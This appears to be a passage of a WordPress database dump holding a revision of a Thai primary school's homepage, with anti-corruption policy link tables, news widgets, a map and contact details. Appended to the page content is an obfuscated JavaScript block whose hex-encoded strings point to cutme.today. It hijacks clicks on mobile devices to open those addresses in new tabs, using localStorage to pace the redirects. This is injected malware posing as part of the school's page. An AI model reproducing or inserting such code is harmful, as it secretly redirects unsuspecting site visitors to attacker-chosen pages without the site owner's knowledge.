style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 09:18:28','2024-08-07 02:18:28','',14,'http://pakhaeng.ssk.in.th/?p=586',0,'revision','',0),
(587,1,'2024-08-07 09:58:02','2024-08-07 02:58:02','','โครงสร้างบุคลากร','','inherit','','closed','','%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a3','','','2024-08-07 09:58:02','2024-08-07 02:58:02','',546,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/โครงสร้างบุคลากร.png',0,'attachment','image/png',0),
(589,1,'2024-08-07 09:58:42','2024-08-07 02:58:42','','โครงสร้างบุคลากร','','inherit','','closed','','%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a3-2','','','2024-08-07 09:58:42','2024-08-07 02:58:42','',546,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/โครงสร้างบุคลากร-1.png',0,'attachment','image/png',0),
